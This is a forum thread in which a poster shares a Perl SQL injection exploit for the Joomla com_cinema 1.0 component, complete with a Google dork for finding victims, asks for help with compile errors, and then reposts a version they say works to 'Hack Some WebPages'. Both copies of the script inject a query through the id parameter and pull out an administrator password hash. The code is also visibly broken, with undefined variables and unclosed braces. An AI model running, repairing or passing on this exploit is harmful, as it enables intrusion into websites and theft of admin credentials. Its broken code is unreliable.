Hi All,Im a newbie in Perl Coding,and i just cant get this to work it says error compiling

This is an Exploit for Hacking Joomla com_cinema
Heres the Code

#!/usr/bin/perl -w

#Joomla Component Cinema 1.0 Remote SQL Injection #
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#[~] Google_Dork: allinurl: "com_cinema"

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #       C0ded By: **RoAd_KiLlEr** From Alboz-Crew             #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln   #\n\n";
print "\t # - Google-Dork: allinurl: "com_cinema"                      #\n\n";
print "\t # - Alboz-Crew.Net                                                     #\n\n";
print "\t # - Cod3d by : **RoAd_KiLlEr*                                  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";

else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";

Thank You :P

Post the compilation errors.

Post the compilation errors.

Thanks but i got it to Work.
Who knows a thing or 2 bout hacking will find this quite useful For Joomla's com_cinema Vulneraiblity and can Hack Some WebPages

Ill Post the Exploit Down :P

#!/usr/bin/perl -w

#Joomla Component Cinema 1.0 Remote SQL Injection#
#[~] Author : **RoAd_KiLlEr**
#[~] Greetz : Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims
#[!] Google-Dork: allinurl: "com_cinema"

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t #        C0ded By: **RoAd_KiLlEr**   From Alboz-Crew          #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla Component Cinema 1.0 Remote SQL Injection Vuln     #\n\n";
print "\t # - Alboz-Crew.Net                                            #\n\n";
print "\t # - Greetz:Ton![W]indowS,KHG,ALBOZ-CREW,B3r0-G & All Muslims  #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_cinema&Itemid=**RoAd_KiLlEr**&func=detail&id=".$U."0,1,0x3a,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,".$c_n."+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";

still need errors..

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